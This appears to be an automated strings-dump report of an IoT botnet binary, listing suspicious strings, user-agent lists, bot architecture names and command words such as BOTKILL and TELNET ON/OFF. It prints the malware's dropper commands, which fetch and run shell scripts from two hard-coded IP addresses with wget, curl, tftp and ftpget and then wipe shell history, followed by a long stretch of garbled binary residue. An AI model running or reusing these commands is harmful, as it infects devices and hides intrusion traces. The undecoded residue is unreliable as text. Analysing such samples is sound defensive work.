=============================================================================
========	BINARY ID :27372a456be4750371eb4da3514bc527e2c0241b==================================================
================================================================================
================================================================================
========	STRINGS SUMMARY : =====================================================
================================================================================
TOTAL STRINGS COUNT :2024
SUPSCPECTED LINES COUNT :150
SUPSCPECTED STRINGS COUNT (DISTINCT) :19
SUPSCPECTED STRINGS WEIGHT :74
SUSPECT STRING SCORE : [74 / 150] 49%
USER AGENTS STRINGS COUNT :105
STATIC IPs STRINGS COUNT :2
DYNAMIC IPs STRINGS COUNT :247
================================================================================
========	STRINGS DETAILS : =====================================================
================================================================================
================================================================================
========	SUSPECTED STRINGS : =====================================================
================================================================================
cd /tmp || cd /var/system || cd /mnt || cd /lib;rm -f /tmp/ || /var/run/ || /var/system/ || /mnt/ || /lib/;cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;busybox wget http://185.101.107.128/UqHDZbqr9S.sh;chmod 777;sh UqHDZbqr9S.sh;busybox tftp -g 185.158.113.30 -r EeckYqY9dV.sh;chmod 777 ;sh EeckYqY9dV.sh;busybox tftp -g 185.158.113.30 -r FRw5K9b9sb.sh;chmod 777 ;sh FRw5K9b9sb.sh\r\n
/dev/netslink/
/usr/
telnet
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Mozilla/5.0 (Linux; Android 5.1.1; LGLS751 Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobi
Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_3 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13G3
Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 OPR/42.0.23'
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2683.0 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36
Mozilla/5.0 (Linux; Android 5.1.1; LG-K330 Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobi
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2672.0 Safari/537.36
Mozilla/5.0 (iPhone; CPU iPhone OS 10_2 like Mac OS X) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0 Mobile/14C9
Mozilla/5.0 (iPhone; CPU iPhone OS 10_1_1 like Mac OS X) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0 Mobile/14
Mozilla/5.0 (Linux; Android 4.4.2; LGLS740 Build/KOT49I.LS740ZV6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.288
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Safari/537.36
Mozilla/5.0 (Linux; Android 4.4.4; HUAWEI H892L Build/HuaweiH892L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.28
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/1
Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910R4 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBr
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 OPR/42.0.2
Mozilla/5.0 (Linux; Android 5.1.1; SM-G925T Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mob
Mozilla/5.0 (X11; CrOS x86_64 8743.85.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.101 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393
Mozilla/5.0 (X11; CrOS x86_64 8872.76.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.105 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.1.2883.83 Secure/55.1.2883.373 Saf
Mozilla/5.0 (Linux; Android 5.1.1; LGLS665 Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Mozilla/5.0 (Linux; Android 5.1.1; SAMSUNG-SM-N910A Build/LMY47X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/55.0.2883.91 Mobile Safari/537.36 Instagram 10.5.1 Android (22/5.1.1; 640dpi; 1440x2560; samsung; SAMSUNG-SM-N910A; trlteatt; qcom; en_US)
Mozilla/5.0 (iPhone; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10
Mozilla/6.0 (Future Star Technologies Corp. Star-Blade OS; U; en-US) iNet Browser 2.5
Mozilla/5.0(iPad; U; CPU iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B314 Safari/531.21.10gin_lib.cc
Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41
Opera/9.80 (J2ME/MIDP; Opera Mini/5.0 (Windows; U; Windows NT 5.1; en) AppleWebKit/886; U; en) Presto/2.4.15Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; MyIE2; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0)
Mozilla/5.0 (Windows; U; Win 9x 4.90; SG; rv:1.9.2.4) Gecko/20101104 Netscape/9.1.0285
BlackBerry9700/5.0.0.743 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/100findlinks/2.0.1 (+http://wortschatz.uni-leipzig.de/findlinks/)
findlinks/1.1.6-beta6 (+http://wortschatz.uni-leipzig.de/findlinks/)
findlinks/1.1.6-beta4 (+http://wortschatz.uni-leipzig.de/findlinks/)
findlinks/1.1.6-beta1 (+http://wortschatz.uni-leipzig.de/findlinks/)
findlinks/1.1.5-beta7 (+http://wortschatz.uni-leipzig.de/findlinks/)
Mozilla/5.0 (X11; U; Linux i686; nl; rv:1.8.1b2) Gecko/20060821 BonEcho/2.0b2 (Debian-1.99+2.0b2+dfsg-1)
AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)
AppEngine-Google; (+http://code.google.com/appengine; appid: unblock4myspace)AppEngine-Google; (+http://code.google.com/appengine; appid: tunisproxy)
AppEngine-Google; (+http://code.google.com/appengine; appid: proxy-in-rs)
AppEngine-Google; (+http://code.google.com/appengine; appid: proxy-ba-k)
AppEngine-Google; (+http://code.google.com/appengine; appid: moelonepyaeshan)
AppEngine-Google; (+http://code.google.com/appengine; appid: mirrorrr)
AppEngine-Google; (+http://code.google.com/appengine; appid: mapremiereapplication)
AppEngine-Google; (+http://code.google.com/appengine; appid: longbows-hideout)
AppEngine-Google; (+http://code.google.com/appengine; appid: eduas23)
AppEngine-Google; (+http://code.google.com/appengine; appid: craigserver)
AppEngine-Google; ( http://code.google.com/appengine; appid: proxy-ba-k)
magpie-crawler/1.1 (U; Linux amd64; en-GB; +http://www.brandwatch.net)
Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)
Mozilla/5.0 (compatible; MJ12bot/v1.2.3; http://www.majestic12.co.uk/bot.php?+)
MJ12bot/v1.0.8 (http://majestic12.co.uk/bot.php?+)
MJ12bot/v1.0.7 (http://majestic12.co.uk/bot.php?+)
Mozilla/5.0 (compatible; MojeekBot/2.0; http://www.mojeek.com/bot.html)
telnetd
botmips
botmipsel
botsh4
botx86_64
botarmv6l
boti686
botpowerpc
boti586
botm68k
botsparc
botarmv4l
botarmv5l
botpowerpc440fp
/bin/sh
/proc/cpuinfo
PING
gethostbyname
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.101.107.128/bins.sh; curl -O http://185.158.113.30/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 185.158.113.30 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 185.158.113.30; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 185.158.113.30 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *;history -c;history -w;rm -rf ~/.bash_history\r\n
pkill -9 
pkill -9 "
%s %s HTTP/1.1\r\nConnection: %s\r\nAccept: */*\r\nUser-Agent: %s\r\n
TELNET
TELNET ON | OFF
[TELNET] OFF
[TELNET] ON
BOTKILL
Killing - %s
KILLATTK
URSTRAITKANCER
/proc/net/route
/usr/bin/python
/usr/sbin/dropbear
[ %s CONNECTED ] [ %s: ] [ Arch Type: %s ]
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
No such process
Interrupted system call
No child processes
Too many open files in system
Read-only file system
Level 2 not synchronized
Machine is not on the network
Name not unique on network
Interrupted system call should be restarted
Socket operation on non-socket
Protocol wrong type for socket
Socket type not supported
Network is down
Network is unreachable
Network dropped connection on reset
Software caused connection abort
Connection reset by peer
Transport endpoint is already connected
Transport endpoint is not connected
Connection timed out
Connection refused
Host is down
No route to host
Operation already in progress
Operation now in progress
Unknown host
Host name lookup failure
/bin/sh
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~
/etc/hosts
/etc/config/hosts
\t\t㽤A૬@ౄ@懣燸儝愐怜衣譅㋬儠戓爄㏬儱㈖褄惣灀Ḇꀃ\t懣煐Ḗ另戲愣焄僦‒愣愒戜懣然℠懣然戓爁∐懣燸儞拣父搓攣囧埨턝䄋\t凩ㄌḙꀑ\t懣燸儝愐愜戓懣燸儞搓攣턕䄋\t勩爁ḩ拣狸懣燸儝焁ም懣燸儝愐愜℘褁긍\t懣燸儞℘褅懣燸儞戒∐凩怓縸濣伦滶\v\t૬@
\tûþÿ䀀üý쐠@懣燠儝焁愐戜鄳㈐謃週ḃꀂ\t鄮ḓ懣焟㋬戠℠懣燠儞拣爟錢搓攣朳턐䄋\t懣燠儝戓爂懣燠儞錒搓攣朳턈䄋\tḁ僡縠濣伦滶\v\týüþ䀀\t쐠@⾆
\tÿ｀´¼\t쏸@⠌@믜@⦈@懣煴儚戓爂錦㏬儲㈓褏鄢阢㛬ㅬ儘䄕褆鄛鈛㋬ㄬ儙䄕謁꺿\t懣煴儜℘褃⸲ꀂ\t
\t\t䐬A礬Bዀ@䐼A䑌A䑜A䑬A䑼A䒈A䒔A䒤A䒴A䓄A䓐A䓜A䓬A䓸A愜戓톫焄愐愜搳敳昣朓톨䄋\t懣燤借蠘謒揣猐
\t\t礬Bዀ@䔈A䔔A䔠A䔬A䔸A䕄A䕔A䕤A䕴A䖄A䖔A䖤A䖴A䗄A敳昣朓톫䄋\t懣燤借蠦謒揣猐
\t\t䚴A礬Bዀ@䛄A䛔A䛤A䛴A䜄A䜔A䜤A䜴A䝄A䝔A䝤A䝴A䞄A䞔A愜戓톫焄愐愜搳敳昣朓톨䄋\t懣燤借衃謒揣猐
\t\t礬Bዀ@䞤A䞰A䟀A䟐A䟠A䟰A䠀A䠐A䠜A䠬A䠸A䡈A䡔A䡤A敳昣朓톫䄋\t懣燤借衑謒揣猐
\t\t䥀A礬Bዀ@䥌A䥘A䥤A䥰A䥼A䦈A䦔A䦤A䦴A䧄A䧔A䧤A䧴A䨄A愜戓톫焄愐愜搳敳昣朓톨䄋\t懣燤借衮謒揣猐
\t\t礬Bዀ@䨔A䨠A䨬A䨸A䩈A䩘A䩨A䩸A䪈A䪘A䪨A䪸A䫈A䫘A敳昣朓톍䄋\t懣燤借衼謒揣猐힉톉焃愐愜戓톇焄愐愜搳敳昣朓톁䄋\t懣燤借衽謒揣猐흿텽焃愐愜戓텻焄愐愜搳敳昣朓텵䄋\t懣燤借衾謒揣猐흴텱焃愐愜戓텯焄愐愜搳敳昣朓텩䄋\t懣燤借衿謒揣猐흩텥焃愐愜戓텣焄愐愜搳敳昣朓텝䄋\t懣燤刟醬㈐謒揣猐흝텙焃愐愜戓텖焄愐愜搳敳昣朓텐䄋\t懣燤刟醔㈐謒揣猐흒테焃愐愜戓텊焄愐愜搳敳昣朓텄䄋\t懣燤刟酼㈐謒揣猐흆텀焃愐愜戓턽焄愐愜搳敳昣朓턷䄋\t懣燤刟酤㈐謒揣猐휻턳焃愐愜戓턱焄愐愜搳敳昣朓턫䄋\t懣燤刟酌㈐謒揣猐휯턧焃愐愜戓턤焄愐愜搳敳昣朓턞䄋\t懣燤刟鄴㈐謒揣猐휤턚焃愐愜戓턘焄愐愜搳敳昣朓턒䄋\t懣燤刟鄜㈐謵揣猐휘턎焃愐愜戓턋焄愐愜搳敳昣朓턅䄋\tꀡ\t
\t£¤¥¦§¨©䵔A礬Bዀ@䵤A䵴A䶀A䶐A䶠A䶰A懣燤刟醬㈐謒揣猐흗텘焃愐愜戓텕焄愐愜搳敳昣朓텒䄋\t懣燤刟醔㈐謒揣猐흎텋焃愐愜戓텉焄愐愜搳敳昣朓텆䄋\t懣燤刟酼㈐謒揣猐흂턿焃愐愜戓턼焄愐愜搳敳昣朓턹䄋\t懣燤刟酤㈐謒揣猐휷턲焃愐愜戓터焄愐愜搳敳昣朓턭䄋\t懣燤刟酌㈐謒揣猐휫턦焃愐愜戓턣焄愐愜搳敳昣朓턠䄋\t懣燤刟鄴㈐謒揣猐휠턙焃愐愜戓턗焄愐愜搳敳昣朓턔䄋\t懣燤刟鄜㈐謭揣猐휔턍焃愐愜戓턊焄愐愜搳敳昣朓턇䄋\tꀙ\tª«¬­®¯°䷀A礬Bዀ@䷐A䷠A䷰A一A丐A丠A懣燤刟醬㈐謒揣猐흗텘焃愐愜戓텕焄愐愜搳敳昣朓텒䄋\t懣燤刟醔㈐謒揣猐흎텋焃愐愜戓텉焄愐愜搳敳昣朓텆䄋\t懣燤刟酼㈐謒揣猐흂턿焃愐愜戓턼焄愐愜搳敳昣朓턹䄋\t懣燤刟酤㈐謒揣猐휷턲焃愐愜戓터焄愐愜搳敳昣朓턭䄋\t懣燤刟酌㈐謒揣猐휫턦焃愐愜戓턣焄愐愜搳敳昣朓턠䄋\t懣燤刟鄴㈐謒揣猐휠턙焃愐愜戓턗焄愐愜搳敳昣朓턔䄋\t懣燤刟鄜㈐謭揣猐휔턍焃愐愜戓턊焄愐愜搳敳昣朓턇䄋\tꀙ\t±²³´µ¶·丰A礬Bዀ@乀A䶐A乐A习A乬A乼A懣燤刟醬㈐謒揣猐흗텘焃愐愜戓텕焄愐愜搳敳昣朓텒䄋\t懣燤刟醔㈐謒揣猐흎텋焃愐愜戓텉焄愐愜搳敳昣朓텆䄋\t懣燤刟酼㈐謒揣猐흂턿焃愐愜戓턼焄愐愜搳敳昣朓턹䄋\t懣燤刟酤㈐謒揣猐휷턲焃愐愜戓터焄愐愜搳敳昣朓턭䄋\t懣燤刟酌㈐謒揣猐휫턦焃愐愜戓턣焄愐愜搳敳昣朓턠䄋\t懣燤刟鄴㈐謒揣猐휠턙焃愐愜戓턗焄愐愜搳敳昣朓턔䄋\t懣燤刟鄜㈐謭揣猐휔턍焃愐愜戓턊焄愐愜搳敳昣朓턇䄋\tꀙ\t¸¹º»¼½¾二A礬Bዀ@亜A京A亼A仌A仜A们A懣燤刟醬㈐謒揣猐흗텘焃愐愜戓텕焄愐愜搳敳昣朓텒䄋\t懣燤刟醔㈐謒揣猐흎텋焃愐愜戓텉焄愐愜搳敳昣朓텆䄋\t懣燤刟酼㈐謒揣猐흂턿焃愐愜戓턼焄愐愜搳敳昣朓턹䄋\t懣燤刟酤㈐謒揣猐휷턲焃愐愜戓터焄愐愜
\t¿ÀÁÂÃÄÅ仼A礬Bዀ@伌A伜A伬A似A佌A作A懣燤刟醬㈐謒揣猐흗텘焃愐愜戓텕焄愐愜搳敳昣朓텒䄋\t懣燤刟醔㈐謒揣猐흎텋焃愐愜戓텉焄愐愜搳敳昣朓텆䄋\t懣燤刟酼㈐謒揣猐흂턿焃愐愜戓턼焄愐愜搳敳昣朓턹䄋\t懣燤刟酤㈐謒揣猐휷턲焃愐愜戓터焄愐愜搳敳昣朓턭䄋\t懣燤刟酌㈐謒揣猐휫턦焃愐愜戓턣焄愐愜搳敳昣朓턠䄋\t懣燤刟鄴㈐謒揣猐휠턙焃愐愜戓턗焄愐愜搳敳昣朓턔䄋\t懣燤刟鄜㈐謭揣猐휔턍焃愐愜戓턊焄愐愜搳敳昣朓턇䄋\tꀙ\tÆÇÈÉÊËÌ佬A礬Bዀ@佼A侌A侜A侬A侼A俌A懣燤刟醬㈐謒揣猐흗텘焃愐愜戓텕焄愐愜搳敳昣朓텒䄋\t懣燤刟醔㈐謒揣猐흎텋焃愐愜戓텉焄愐愜搳敳昣朓텆䄋\t懣燤刟酼㈐謒揣猐흂턿焃愐愜戓턼焄愐愜搳敳昣朓턹䄋\t懣燤刟酤㈐謒揣猐휷턲焃愐愜戓터焄愐愜搳敳昣朓턭䄋\t懣燤刟酌㈐謒揣猐휫턦焃愐愜戓턣焄愐愜搳敳昣朓턠䄋\t懣燤刟鄴㈐謒揣猐휠턙焃愐愜戓턗焄愐愜搳敳昣朓턔䄋\t懣燤刟鄜㈐謭揣猐휔턍焃愐愜戓턊焄愐愜搳敳昣朓턇䄋\tꀙ\tÍÎÏÐÑÒÓ俜A礬Bዀ@俬A俼A倌A倜A倬A值A懣燤刟醬㈐謒揣猐흗텘焃愐愜戓텕焄愐愜搳敳昣朓텒䄋\t懣燤刟醔㈐謒揣猐흎텋焃愐愜戓텉焄愐愜搳敳昣朓텆䄋\t懣燤刟酼㈐謒揣猐흂턿焃愐愜戓턼焄愐愜搳敳昣朓턹䄋\t懣燤刟酤㈐謒揣猐휷턲焃愐愜戓터焄愐愜搳敳昣朓턭䄋\t懣燤刟酌㈐謒揣猐휫턦焃愐愜戓턣焄愐愜搳敳昣朓턠䄋\t懣燤刟鄴㈐謒揣猐휠턙焃愐愜戓턗焄愐愜搳敳昣朓턔䄋\t懣燤刟鄜㈐謭揣猐휔턍焃愐愜戓턊焄愐愜搳敳昣朓턇䄋\tꀙ\tÔÕÖ×ØÙÚ偈A礬Bዀ@偘A偨A偸A傈A傘A储A懣燤刟醬㈐謒揣猐흗텘焃愐愜戓텕焄愐愜搳敳昣朓텒䄋\t懣燤刟醔㈐謒揣猐흎텋焃愐愜戓텉焄愐愜搳敳昣朓텆䄋\t懣燤刟酼㈐謒揣猐흂턿焃愐愜戓턼焄愐愜搳敳昣朓턹䄋\t懣燤刟酤㈐謒揣猐휷턲焃愐愜戓터焄愐愜
\tÛÜÝÞßàá傸A礬Bዀ@僈A僘A僨A僸A儈A儘A懣燤刟醬㈐謒揣猐흗텘焃愐愜戓텕焄愐愜搳敳昣朓텒䄋\t懣燤刟醔㈐謒揣猐흎텋焃愐愜戓텉焄愐愜搳敳昣朓텆䄋\t懣燤刟酼㈐謒揣猐흂턿焃愐愜戓턼焄愐愜搳敳昣朓턹䄋\t懣燤刟酤㈐謒揣猐휷턲焃愐愜戓터焄愐愜搳敳昣朓턭䄋\t懣燤刟酌㈐謒揣猐휫턦焃愐愜戓턣焄愐愜搳敳昣朓턠䄋\t懣燤刟鄴㈐謒揣猐휠턙焃愐愜戓턗焄愐愜搳敳昣朓턔䄋\t懣燤刟鄜㈐謭揣猐휔턍焃愐愜戓턊焄愐愜搳敳昣朓턇䄋\tꀙ\tâãäåæçè儨A礬Bዀ@儸A先A兘A全A典A冈A懣燤刟醬㈐謒揣猐흗텘焃愐愜戓텕焄愐愜搳敳昣朓텒䄋\t懣燤刟醔㈐謒揣猐흎텋焃愐愜戓텉焄愐愜搳敳昣朓텆䄋\t懣燤刟酼㈐謒揣猐흂턿焃愐愜戓턼焄愐愜搳敳昣朓턹䄋\t懣燤刟酤㈐謒揣猐휷턲焃愐愜戓터焄愐愜搳敳昣朓턭䄋\t懣燤刟酌㈐謒揣猐휫턦焃愐愜戓턣焄愐愜搳敳昣朓턠䄋\t懣燤刟鄴㈐謒揣猐휠턙焃愐愜戓턗焄愐愜搳敳昣朓턔䄋\t懣燤刟鄜㈐謭揣猐휔턍焃愐愜戓턊焄愐愜搳敳昣朓턇䄋\tꀙ\téêëìíîï冘A礬Bዀ@冨A冸A凈A凘A凨A凸A懣燤刟醬㈐謒揣猐흗텘焃愐愜戓텕焄愐愜搳敳昣朓텒䄋\t懣燤刟醔㈐謒揣猐흎텋焃愐愜戓텉焄愐愜搳敳昣朓텆䄋\t懣燤刟酼㈐謒揣猐흂턿焃愐愜戓턼焄愐愜搳敳昣朓턹䄋\t懣燤刟酤㈐謒揣猐휷턲焃愐愜戓터焄愐愜搳敳昣朓턭䄋\t懣燤刟酌㈐謒揣猐휫턦焃愐愜戓턣焄愐愜搳敳昣朓턠䄋\t懣燤刟鄴㈐謒揣猐휠턙焃愐愜戓턗焄愐愜搳敳昣朓턔䄋\t懣燤刟鄜㈐謭揣猐휔턍焃愐愜戓턊焄愐愜搳敳昣朓턇䄋\tꀙ\tðñòóôõö刈A礬Bዀ@刘A刨A券A剈A剘A剨A懣燤刟鄢㈐謒揣猐휏턐焃愐愜戓턍焄愐愜搳敳昣朓턊䄋\t懣焐搓턈䄋\t愃怓縤濣伦滶\v\t÷剸A礬Bዀ@쁜@
\t\t喨A먀@쿼@륀@唰A뷴@⛘@肤@ꀤ@톂䄋\t 褁ꁏ\t翴拳懣焔匑懣焔園懣焔嘓懣焔倔懣焔儖−懣焔儕ሑ懣焔儗ሒ搳敳會텱䄋\t缌텰䄋\t懣燔儝愒퉭搓攣텭䄋\t 褁ꂗ\t懣燔刞㈗謕懣燔儝焈愒搓텤䄋\t䀕謊懣燔儝焌愒搓텟䄋\t䀕褁ꇊ\t懣燔儝焄拣爔愒ሙ懣燔儝焈愒搓텔䄋\t懣焔ᄊ懣燔儝焌愒搓텎䄋\t懣焔ᄋ懣焔儙搓텊䄋\t愃℘褵懣焔儙퉆搓攣텆䄋\t懣焔ᄌꀡ\t턺䄋\t 謒懣焔刜懣焔匚懣焔儛搣攳易턺䄋\t턱䄋\t턵攓턴䄋\t懣焔ᄌ懣焔儜℘诙ꀘ\t턦䄋\t 讗懣焔则懣焔匚懣焔儛搣攳易턦䄋\t턝䄋\t懣燔儝愒툢搓攣턚䄋\t 褁ꃙ\t懣燔刞㈗褁ꄻ\t懣燔儝焄愒搓턑䄋\t愃℘謁ꁻ\t懣燔儝焄愒툌搓攣턋䄋\t懣焔ᄍꁤ\t⛘@肤@ꀤ@喬A먀@쿼@륀@唰A뷴@虐@喰A톈䄋\t 謿懣燔儝焄愒栓懣燔儝焈愒椓懣燔儝焌愒搓텾䄋\t愍樓懣燔儝焐愒欓懣燔儝焔愒搓텵䄋\t氃懣燔儝焘愒搓텰䄋\t翸懳⇂ᄁ撃斓暣枳텬䄋\t缈텪䄋\t텪攓텩䄋\t懣焔ᄍ懣焔儝℘讬ꁇ\t텞䄋\t 褁ꂪ\t懣燔儝焄愒栓懣燔儝焈愒椓懣燔儝焌愒搓텒䄋\t愍樓懣燔儝焐愒欓懣燔儝焔愒搓텊䄋\t氃懣燔儝焘愒搓텅䄋\t翸懳⇂ᄁ撃斓暣枳텀䄋\t缈턿䄋\t懣燔儝愒툾搓攣턾䄋\t 褁ꁌ\t拣爔ሞ拣爔ሟꀶ\t懣焔償䄈戓턴愒ㄬ愒℘褣懣焔償䄈戓턮愒ㄬ栒턭䄋\t愃㠐褔懣焔償䄈戓턧愒ㄬ愒搓턦䄋\t拣爔懣焔儞焁ሞ拣爔懣焔償焁ሟ揣猔儿팜吱挲㉀輁㉂ㄲ讽懣燔儝愒툗搓攣턑䄋\t 謃턔䄋\t織濣伦滶泶毶櫶槶棶\v\t\t⛘@쿼@縜@ꀤ@唰A뷴@喴A먀@
\t\t\t\t\t\t\t恣⁋⁛♨贘젃恃ぬ贵㕈ㅧ痿輑捓䘁Ŝ輄珿♨贆—Ŝȼ䘐—迺․\v\t\v恃젃贅⌉䌐Ŝ盿迻—甁挃恓적輋㙳贄젂贬怳ꂪ\t赈怳ꂶ\t젂趃怳꾡\t\t捓ㅧ痼謻䘉䘁Ş輄珸♨贆‖ŞȾ䘐‖迺…\v\t\t\t\t\t\t\t\t\t\t\t\t痼权Ş看☨捓贂珼‖ŞȾぶ‖跺…甃㐀矶褃Ŝぶ跼—\v\t\t\t\t\t\t\t痼挃⌙扃〰爟贏∙Ş전晓盼贄猈젘贆‖Şݮ〰‖迺⁶⾆㔌⾖愃⾦痤⾶偐燠卑噒坓塔奕婖字ǃᄱᅢᅳᆄ痠ᆕㄠᆦ迬ᆷ怓毶㔘櫶
\t\t\t\t\t\t晓痾扃盼爇ŝͭ〦―跺‵ꁂ\t\t\t\t挃⌙扃〰爟痾贅∙猂ŝ〰迼―⾆㔌⾖愃⾦痢⾶⿆恕燠捖晖䀨杖‽桖⍭楖♽橖➍歖⢝汕⦭ǃ⪽ᄱ
\t\t癪ᨊ㨪婊抓揢狸慃圡猆ꁃ燼抓揢狴慃嘢猅ꀹ燸抓揢狰慃圣猄ꀯ燴抓揢独慃嘤猃ꀥ燰抓揢狨慃圥猂ꀛ燬抓揢狤慃嘦猁ꀑ燨抓狠圧慃ꀉ燤抓狜揢慃嘨燠珿圧ᅧ嘦ᅶ圥ᅥ嘤ᅴ圣ᅣ嘢ᅲ圡ᅡ珸昢⌸ⅲ狠迫燠ᅧꁞ櫢䰭➩毋㜖⊙捃笠贇爄윂żģ\t\t㠬ᰌꀝ狴櫢唢捃堡稂ꀭ珼狰櫢圣捃唢稁ꀝ珸独捃嘤圣ꀏ珴狨櫢堥捃嘤竿珰懋散䢽圣䔝慓
================================================================================
========	USER AGENTS STRINGS : =====================================================
================================================================================
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Mozilla/5.0 (Linux; Android 5.1.1; LGLS751 Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobi
Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_3 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13G3
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
